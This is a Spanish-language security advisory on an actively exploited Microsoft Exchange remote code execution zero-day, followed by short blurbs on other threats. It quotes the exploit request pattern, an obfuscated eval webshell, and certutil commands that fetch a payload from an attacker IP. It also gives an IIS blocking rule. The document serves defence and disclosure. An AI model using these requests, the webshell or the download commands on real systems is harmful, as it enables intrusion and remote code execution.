CUIDADO DE LA SALUD
Minimice el riesgo de explotación de los datos del paciente
Novedades
Detalle técnico
Recientemente la empresa de Ciberseguridad vietnamita GTSC, detectó e informó sobre vulnerabilidad 0-Day en la plataforma Microsoft Exchange, lo que permite la ejecución de código remoto, la misma fue descubierta en el código de Exchange, la cual se clasificó como crítica.
Asimismo, GTSC envió la vulnerabilidad a Zero Day Initiative (ZDI) para trabajar con Microsoft para que pudieran preparar un parche lo antes posible. ZDI verificó y validó 2 errores, cuyos puntajes CVSS actualmente son 8.8 y 6.3.
Dicha actividad exploit se realiza en 2 pasos:
• Solicitudes con un formato similar a la vulnerabilidad de ProxyShell: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com.
• El uso del enlace anterior para acceder a un componente en el backend donde se podría implementar el RCE (Remote Code Execution).
Actividades posteriores a la explotación
Webshell
El atacante usa Antsword, una herramienta activa de administración de sitios web multiplataforma de código abierto con sede en China que admite la administración de webshell.
<%@Page Language="Jscript"%>
<%eval(codificación System.Text.En. GetEncoding(936). GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936). GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936). GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>
Otra característica es que el atacante cambia el contenido del archivo RedirSuiteServiceProxy.aspx a contenido de webshell. RedirSuiteServiceProxy.aspx es un nombre de archivo legítimo disponible en el servidor de Exchange.
Ejecución de comandos
Además de recopilar información sobre el sistema, el atacante descarga archivos y comprueba las conexiones a través de certutil, que es una herramienta legítima disponible en el entorno de Windows, inyecta DLL maliciosos en la memoria, deja caer archivos sospechosos en los servidores atacados y ejecuta estos archivos a través de WMIC.
"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]
"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]
Cabe señalar que cada comando termina con la cadena echo [S]&cd&echo [E], que es una de las firmas del Chopper chino.
Recomendación
Como medida temporal (confirmada), y mientras se espera por el parche oficial por parte de Microsoft, se recomienda añadir una regla de bloqueo en el módulo URL Rewrite Rule de IIS.
• En «Autodiscover» en «FrontEnd» seleccione la pestaña «URL Rewrite» y luego «Request Blocking«.
• Agregue el siguiente string en «URL Path«: “.*autodiscover\.json.*\@.*Powershell.*“.
• En «Condition» elija {REQUEST_URI}.
Se sugiere actualizar Microsoft Exchange a la última versión disponible lo antes posible, hasta que encuentre a disposición el parche correspondiente.
Fuentes
• https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
• https://www.bleepingcomputer.com/news/security/new-microsoft-exchange-zero-day-actively-exploited-in-attacks/
Investigadores de seguridad advierten que algunos atacantes están comprometiendo las cuentas de Microsoft Teams para colarse en los chats y distribuir ejecutables maliciosos a los participantes en la conversación.
Un gusano informático, también conocido como “worm”, es un tipo de malware que tiene la capacidad de propagarse de forma automatizada para infectar la mayor cantidad de computadoras posibles de manera rápida, tanto sobre una red hogareña como corporativa. Pueden llegar a ralentizar la máquina víctima o la red en la que se encuentra, ya sea por un alto consumo de los recursos del equipo o por un alto consumo de la red.
Conoce las acciones que puedes tomar para protegerte de la vulnerabilidad critica en la librería Log4j en el servidor Web de Apache. Esta vulnerabilidad esta identificada con el siguiente CVE: CVE-2021-44228. Esto impacta múltiples servicios y aplicaciones, incluyendo servicios tan populares como Minecraft, Steam y el iCloud de Apple.
El grupo Lazarus lanzo una variante del ransomware MACROMATA. Conoce el análisis del S.O.C. de RAN Security sobre esta amenaza.
Una estafa de salida comienza cuando estafadores crean un fondo de inversión o lanzan una Initial Coin Offer (ICO), que es una oferta inicial para atraer inversionistas a un nuevo proyecto. El objetivo de los delincuentes es atraer rápidamente la atención de inversionistas hasta que el fondo llegue a cierto monto en activos. Luego, de un momento a otro cierran las operaciones y desaparecen de la red con el dinero de los inversionistas. En otras palabras, lo que se busca en este tipo de estafas es crear un falso proyecto de criptoactivo con alguna característica notable que lo haga atractivo en el mercado; por ejemplo, una alta rentabilidad. De esta manera se intenta transmitir confianza para que las personas decidan invertir en el proyecto, pero lo que no saben es que la verdadera intenció